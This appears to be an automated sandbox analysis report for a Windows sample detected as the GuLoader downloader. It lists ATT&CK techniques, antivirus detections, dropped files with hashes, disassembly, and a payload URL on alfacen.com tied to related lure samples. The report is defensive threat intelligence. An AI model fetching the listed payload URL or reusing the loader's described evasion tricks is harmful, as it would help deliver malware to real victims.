Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 4_2_359FFCAB mov eax, dword ptr fs:[00000030h] | 4_2_359FFCAB
Source: C:\Users\user\Desktop\450707124374000811.exe | Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_00403373
MITRE ATT&CK matrix (techniques matched by this analysis carry the count of matching signatures in parentheses):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (1) | DLL Side-Loading (1) | Access Token Manipulation (1) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (211) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection (1) | Virtualization/Sandbox Evasion (1) | LSASS Memory | Virtualization/Sandbox Evasion (1) | Remote Desktop Protocol | Clipboard Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Access Token Manipulation (1) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (1) | NTDS | System Information Discovery (23) | Distributed Component Object Model | Input Capture | Application Layer Protocol (3) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (2) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | DLL Side-Loading (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

Source | Detection | Scanner | Label | Link
450707124374000811.exe | 45% | ReversingLabs | Win32.Trojan.Guloader
450707124374000811.exe | 100% | Avira | HEUR/AGEN.1337946
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
alfacen.com | 193.107.36.30 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://alfacen.com/GZgWeuQ77.bin | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 450707124374000811.exe, 00000004.00000001.2850520898.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | unknown
https://alfacen.com/GZgWeuQ77.bince | 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://alfacen.com/GZgWeuQ77.binR | 450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 450707124374000811.exe, 00000004.00000001.2850520898.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | unknown
https://alfacen.com/GZgWeuQ77.bines | 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://alfacen.com/GZgWeuQ77.binH | 450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.ftp.ftp://ftp.gopher. | 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | unknown
https://alfacen.com/GZgWeuQ77.bine | 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://nsis.sf.net/NSIS_ErrorError | 450707124374000811.exe | false | URL Reputation: safe | unknown
https://alfacen.com/ | 450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://alfacen.com/GZgWeuQ77.binnsz | 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
193.107.36.30 | alfacen.com | Bulgaria | BG | 201200 | SUPERHOSTING_AS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1538185
Start date and time: 2024-10-20 19:14:33 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 450707124374000811.exe
Detection: MAL
Classification: mal80.troj.evad.winEXE@2/8@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 48
                              • Number of non-executed functions: 294
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: 450707124374000811.exe
                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.107.36.30 | 3507071243740008011.exe | malicious | GuLoader |
193.107.36.30 | 3507071243740008011.exe | malicious | GuLoader |
193.107.36.30 | Potwierdzenie.exe | malicious | GuLoader |
193.107.36.30 | Potwierdzenie.exe | malicious | GuLoader |
193.107.36.30 | SKM_C16024100408500.vbs | malicious | GuLoader |
193.107.36.30 | SKM_C25024100408500.vbs | malicious | GuLoader |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
alfacen.com | 3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
alfacen.com | 3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
alfacen.com | Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
alfacen.com | Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
alfacen.com | SKM_C16024100408500.vbs | malicious | GuLoader | 193.107.36.30
alfacen.com | SKM_C25024100408500.vbs | malicious | GuLoader | 193.107.36.30
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SUPERHOSTING_AS | 3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
SUPERHOSTING_AS | 3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
SUPERHOSTING_AS | Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
SUPERHOSTING_AS | Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
SUPERHOSTING_AS | SKM_C16024100408500.vbs | malicious | GuLoader | 193.107.36.30
SUPERHOSTING_AS | SKM_C25024100408500.vbs | malicious | GuLoader | 193.107.36.30
SUPERHOSTING_AS | Atlanta Office Interiors #024-010.pdf | malicious | Unknown | 185.45.66.155
SUPERHOSTING_AS | https://ipexcel-my.sharepoint.com/:u:/p/bhaskar/EXkHa_fTPjZKq-NlTqXIh7sBrIzBSy8pqbKPLGCEzX2rbA | malicious | Unknown | 185.45.66.155
SUPERHOSTING_AS | Arcadia Aerospace Industries LLC (Code qJG7x-ZymK9p-KYuh).html | malicious | Unknown | 193.107.36.200
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | 3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
37f463bf4616ecd445d4a1937da06e19 | Unlock_Tool_2.3.1.exe | malicious | Vidar | 193.107.36.30
37f463bf4616ecd445d4a1937da06e19 | 3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
37f463bf4616ecd445d4a1937da06e19 | aZm1EZ2IYr.exe | malicious | Vidar | 193.107.36.30
37f463bf4616ecd445d4a1937da06e19 | Unlock_Tool_2.4.exe | malicious | Vidar | 193.107.36.30
37f463bf4616ecd445d4a1937da06e19 | JuyR4wj8av.exe | malicious | Stealc, Vidar | 193.107.36.30
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.FileRepMalware.4445.21502.exe | malicious | Unknown | 193.107.36.30
37f463bf4616ecd445d4a1937da06e19 | yAkRyU2LPe.exe | malicious | Vidar | 193.107.36.30
37f463bf4616ecd445d4a1937da06e19 | EL7ggW7AdA.exe | malicious | Stealc, Vidar | 193.107.36.30
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll | 3507071243740008011.exe | malicious | GuLoader |
C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll | 3507071243740008011.exe | malicious | GuLoader |
C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll | Potwierdzenie.exe | malicious | GuLoader |
C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll | Potwierdzenie.exe | malicious | GuLoader |
C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll | RICHIESTA_OFFERTA_RDO2400423.docx.doc | malicious | GuLoader |
C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | malicious | Remcos, GuLoader |
C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | malicious | GuLoader |
C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll | Nutzen_Unterschrift_Planen#2024.com.exe | malicious | Remcos, GuLoader |
C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll | Nutzen_Unterschrift_Planen#2024.com.exe | malicious | GuLoader |
Process: C:\Users\user\Desktop\450707124374000811.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.659026618805001
Encrypted: false
SSDEEP: 192:eX24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlqSlS:D8QIl972eXqlWBFSt273YOlqz
MD5: 9625D5B1754BC4FF29281D415D27A0FD
SHA1: 80E85AFC5CCCD4C0A3775EDBB90595A1A59F5CE0
SHA-256: C2F405D7402F815D0C3FADD9A50F0BBBB1BAB9AA38FE347823478A2587299448
SHA-512: DCE52B640897C2E8DBFD0A1472D5377FA91FB9CF1AEFF62604D014BCCBE5B56AF1378F173132ABEB0EDD18C225B9F8F5E3D3E72434AED946661E036C779F165B
Malicious: false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: 3507071243740008011.exe, Detection: malicious, Browse
                                                            • Filename: 3507071243740008011.exe, Detection: malicious, Browse
                                                            • Filename: Potwierdzenie.exe, Detection: malicious, Browse
                                                            • Filename: Potwierdzenie.exe, Detection: malicious, Browse
                                                            • Filename: RICHIESTA_OFFERTA_RDO2400423.docx.doc, Detection: malicious, Browse
                                                            • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious, Browse
                                                            • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious, Browse
                                                            • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious, Browse
                                                            • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious, Browse
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\450707124374000811.exe
File Type: data
Category: dropped
Size (bytes): 283894
Entropy (8bit): 7.702006100164842
Encrypted: false
SSDEEP: 6144:vhdVvrRbGmvDU6wCxZkgdpQWENGHJCLJqjFaX6ql6ytdwD:vtvrRbGmvrwcZkg8zcHJCLkmt2D
MD5: D60DE2837DB415CC4F66B85247B99A5B
SHA1: 7C46A763764028D65B812909021A647305772AB0
SHA-256: 3105B5A8590A4AEE190FFAAF4C84D09B123F08DD1B6F34677BBF1BB69AECC716
SHA-512: 36C9CA47DC9E55AC81CB242E7848C91913B3737579F52A39570CF1247770517BAF003812F01999A2B45CC9193FAA85910EBE9B0D1C3E960AC3E1A24D84366101
Malicious: false
Reputation: low

Process: C:\Users\user\Desktop\450707124374000811.exe
File Type: data
Category: dropped
Size (bytes): 82981
Entropy (8bit): 4.614849518351854
Encrypted: false
SSDEEP: 1536:HD0Zl31ONi8ZXxYo6qRyCkWuE78I23R0HEpJQ3Tv:HD0ObxxhcCkxg4QDv
MD5: 12629C74AA6BCA8746FD8DB17EE09A8F
SHA1: A0EECC9D844403FE34CB19B19AB2CE32202B77F3
SHA-256: 209451B54F4D28E90AE8D1B6A073C1234236CCEE38870399027001F5E9E38908
SHA-512: 930C34FA9C781A8D4EFBB7DAAC625C1AFBB0BECDEC93DF745D0C8F17CB2FEFCA034539668A361AF4F0AA482271C3BD746B18C8BFEC17EFCD2666C8C5187722A7
Malicious: false
Reputation: low
Preview: ....{{..J.....P..::...................:...CC.1.....OO....}}.++.........III..n...h..........8.-......................,....MMMM.;.:::......}}....<....................SSSS....7..........##....5......^^^.....3....bb................VV........N.}}}...........J........22.v.................kk.....(((((((((((.............e.YYY..............o.....................B.llll...........#....Q.9.000.......]]]......F..........AAAA.g.YY........NNN..........WWW..................%%...............TTT...........A.......i.Y.zzzz....$...........%............t...........x.........a....k........mmmm..u...c....................`.....................gg............'''.......m.ii.........LL.NN.A.............o..........#.. ...###..........!...h..}............^..>......HHHHH...LLL...........}}............................jj...?........%%%%.............c...uu...............>...+....,,...R...d.......???..............f......DD.....................9.........$........O................. .....S......zz.........qq........x..XXX.

Process: C:\Users\user\Desktop\450707124374000811.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 999x605, components 3
Category: dropped
Size (bytes): 167813
Entropy (8bit): 7.749904770387752
Encrypted: false
SSDEEP: 3072:icF5a5FZl5xa0SYazQR5dRfp3oVadIALnwP5kipQlMXG6g9:5r2x1SYkQR53fpoVABLnwRk0QKXRg9
MD5: 8C0739994C90303B65A05C6909A53B62
SHA1: E43239AF385F8DED6EA2098D2A71A2AC9519E32B
SHA-256: 7E1835782673A877C8A4FF9A4E9E88A23D8FA54077B6E7E1D70FBDE5F3A9D66B
SHA-512: 65BB94BEE91A5581EC7BEFE758F2AD71235ED07DEDDC5B85F5E5719B62E2ADCEFDFB080C9DC5D5C67BC2DBA846C26B62E8E043DCF33F02F65B9B18FC4942277F
Malicious: false
Reputation: low
Preview: ......JFIF.....H.H....9Rhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 2007 22:37:37 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Make>Canon</tiff:Make>. <tiff:Model>Canon DIGITAL IXUS 800 IS</tiff:Model>. <tiff:Orientation>1</tiff:Orientation>. <tiff:XResolution>72/1</tiff:XResolution>. <tiff:YResolution>72/1</tiff:YResolution>. <tiff:ResolutionUnit>2</tiff:ResolutionUnit>. <tiff:YCbCrPositioning>1</tiff:YCbCrPositioning>. <tiff:Compression>6</tiff:Compression>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:xap="http://ns.adobe.com/xap/1.0/">. <xap:ModifyDate>2008-12-25T21:16:15Z</xap:ModifyDate>. <xap:CreatorTool>Adobe

Process: C:\Users\user\Desktop\450707124374000811.exe
File Type: data
Category: dropped
Size (bytes): 329924
Entropy (8bit): 4.933260234424776
Encrypted: false
SSDEEP: 6144:sXxDu/qV1rYX0GEETHfS1YHoQccZ6eJ7Myv5CTV:shy/qSu6qJcZFJPBi
MD5: 562A26D4A57C23D2AE8BD4DECE37E771
SHA1: A9830E759E670EB8D4EFC5320A112E44ECB389BA
SHA-256: EDF2898EFF5E72AA11993272EB941C1CD992BB6243E4D2F5940BD88EDF9117CD
SHA-512: 50E8291CB30F1916A5FC41EC7A64C9690A5ABD2AA5B56277029AB04EBCA19769DA91C214C4098B7FC5A8E7E048EBACFC9CFD41540F613B65C1BFF92AEAC49496
Malicious: false
Preview: ......s.......|Xkt........"..y....8W..........6.......g...k.X......G,..........Q...+...M......2....Vr......3....n...q^D.......J.-........l.........&....~.......E,..(d...e.....S......a........J...#............w..).......y.?....b.........\.............u...............y.6....].j..........y......4.......T...x......O7....E.....)...|.J.9..)...5c...^..'.......YA............#t...e.....}.....B......"............K..0...{......Z..,........\....X...D.y........j(...........l......*......0.........j.E6.......................t...................Bm-............N...`..................A..../{...(...hN...............k...X...Y.m...P......^....O?..........C.e........B..b............y..M...P...... y............|....}.8..H..........y................r.oS!.'..G...l.7.*.....q..tO..g.....,..........~.................?..............V.B.........B......n/..j...............e...........0.mo.b......Ix.....=..Q.!..G............Q\4n..........O.br.7....d.nvH.t.....`...b......A.+...1............j....w......T.

Process: C:\Users\user\Desktop\450707124374000811.exe
File Type: data
Category: dropped
Size (bytes): 48084
Entropy (8bit): 4.914629993393861
Encrypted: false
SSDEEP: 768:D/rnROkWNBnJ+9RlvYC45nQikaSOn/i7/nY1kakXzsDwft2EwNWBbTvMIQwBT:zrx8BnJ+lyzknku2kakXYDwcEcWbwoBT
MD5: 511E6E568EBCF13D5098054630C627AA
SHA1: 1B5AFC7023C138219737E23B00121C359BF8443F
SHA-256: 204A44F0D3C3B63E36B3A4865C029552CCD8AC1EAD3507456BEC7886D724BA54
SHA-512: DC3088BA850BA2258715826CF985D417A6A138A9EF66F43EBC69EB18CEDA9F4B65686C3F70E2BA39E64AEB8B55B82F550EE603094F06B988DC122299183075E8
Malicious: false
Preview: .................3v......0...........8......n..m....i............d ...... ..........'..MDY...... ...|............-.....|....dt...........G...bC..J............~....?..@........?.k..................z..!........k........................i.......|f.....X.(.......N..X..v....>..e..................J.....T..........3."...p9...r....2........................<..".......qj...i.`.;........a..........v...k.......%.f......os.....,....(.*.....|...#...y.7....,...............c.......i.9H............L..sx...{....=.....N'..\...|.B.....U...&.........B1J<................A....1.....A}\.7.Q........7................K..............C%......8...G....a.................................T.Y.kB.........P............o...&.`....{...{..A.........f....`.........q..............d.............W.......1-...>..R.)s;".e......0..B...].....E........R..............`.......{'...........0...m........._t.........x..............#.p....@_3..j.o............................C......=`...........Nx....Q\......:....A....5...e......~..

Process: C:\Users\user\Desktop\450707124374000811.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 501
Entropy (8bit): 4.284126845947256
Encrypted: false
SSDEEP: 12:7Dvz9cWhFxJiWtT/ksqSYLbLGLW+/tbV90QhtdtmCq/oK6:vpJrilbgW+hHfmCq/ol
MD5: 5D2F45598C5DAD8A461CECDA82CA550E
SHA1: D594FFDAE11463E5E35170D27C611182F16E038C
SHA-256: 65D3114548018688712A3B735E3B9BA63C2261A5DA9B6505D43378DE5E351B87
SHA-512: BF9654722B7F313B0E5C9A755C0DA9D37930FA517CA43F36C97F6033C7C764ACACDAC8FDE143A9D89D33D9ED7CC4EE08A96A0DEB14D484E4ACB43E830CA15470
Malicious: false
Preview: wellcurbs realkreditlaan rhamnoses aluminiumfoliens needlecase gld.bromelin scoters mormoder klinges albigensianism sociolektens curpel shuttles awreck laboratorieopgave eksercerskoler..nonfederated sprinklingers multiplepoinding indfaldsvinkelen korttegnere opinionsmaalingernes exobiology.amazingly palikars accessibility matriarchical erstatningskravene dorns..reclaimant prepubescent unfairest lusiad uhmmedes proctodaeum sydslesvigers.stormwise septaemia rangsforskel flytteligt hardboard dentex,

Process: C:\Users\user\Desktop\450707124374000811.exe
File Type: data
Category: dropped
Size (bytes): 54488
Entropy (8bit): 4.944297757860882
Encrypted: false
SSDEEP: 1536:BYkiahV7T7eAwz8ruqJUjhEXVM54+suwGXs:BFiahJTCAi8dQ6M54rWs
MD5: 4ECFFF116FE03C56DAD5B0EAE0279D00
SHA1: 18525703697F059B03F7A1F093317E62BAD43004
SHA-256: 593BF06B816C8CACBA83C6CCECD0C3F0F164C4D9CC7F9B4EA7BF2EA2F0CD7906
SHA-512: D6EBCD15BEE3AD32BB91D7EFEAB363B917127ACF62A8838E621FFA0F080060E00E06BDACD9F2BDD4BE37DFC1A9449A4CE678BC1821E005BAEC3263272BF8877A
Malicious: false
Preview: .... ........a....D..o.X...........&.=...x.....l...w......h.2....D ..............6...V^.~...u.......v...(.......8Q..7.................6....A6.....;..5.T.P......K...I...]...........Bk.....4......4.....'...z....k./.....r......f..8.5....S......T..0......."...x...S........@......(......z.;...H...3'd.d.....{.c..Z...3........|...........].i...2....8.{....0............8.............6...<.@C..r..$3...N=...+..].s...6.........N........y........I..........W....&.........T....}............bd.g................,.......I#..J/...C-.....e...}!..........J..B.P...............{..................8i....$................1.1......[.............>....`4y....A.kA......U........[...dmE..5.......)...e...).....l....T.l......................................`.[....l.N..=...........$....g.... ....Z.<v...?....>...L.o..........D.......&'.*.........2..............k......... 2E... ....KT..2.,.......`.c...........d.E.......<p......!0...I.U....9.._.....a..o5>...............+.....]...P...D....C@..N.........w.hx..

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.7511646883690775
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 450707124374000811.exe
File size: 1'001'467 bytes
MD5: 22aeab62009aaa9073b3159d7da1195e
SHA1: 602dd47b6910a522be90fc47d10d5c26a836a01a
SHA256: 1fc195e3937e7c7d9ca78f9c39f8997d5ed98fe1c608ad5c7b4a01dc24ddd967
SHA512: 057f99c072baf1b2c4aadbf5851ac90288af03d991a2b2732d2d9e3c6856a62cbb3c44416e6fb6f67e193a6e50c79d0afb8f5d61f5d9a39e903f9179850b8286
SSDEEP: 24576:8HANkRMLHpVBNAVC+qTC0otgAhHYGDL4kJiMv:8HANkRMLHf3OC+qTfPGD0aJ
TLSH: DD251205E3A06467C3F5CBF807A6925B7A3BDC79E641074B0352B76A2A78741F14E3AC
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...~..Y.................f.........
Icon Hash: c4bcaaec6ceeda31
Entrypoint: 0x403373
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x597FCC7E [Tue Aug 1 00:34:06 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b34f154ec913d2d2c435cbd644e91687

Instruction (entrypoint disassembly):
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [00434EECh], eax
je 00007FBCC88FDF03h
push ebx
call 00007FBCC8901199h
cmp eax, ebx
je 00007FBCC88FDEF9h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FBCC8901113h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FBCC88FDEDCh
push 0000000Ah
call 00007FBCC890116Ch
push 00000008h
call 00007FBCC8901165h
push 00000006h
mov dword ptr [00434EE4h], eax
call 00007FBCC8901159h
cmp eax, ebx
je 00007FBCC88FDF01h
push 0000001Eh
call eax
test eax, eax
je 00007FBCC88FDEF9h
or byte ptr [00434EEFh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [00434FB8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B208h
call dword ptr [00408188h]
push 0040A2C8h

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6a000 | 0x34908 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
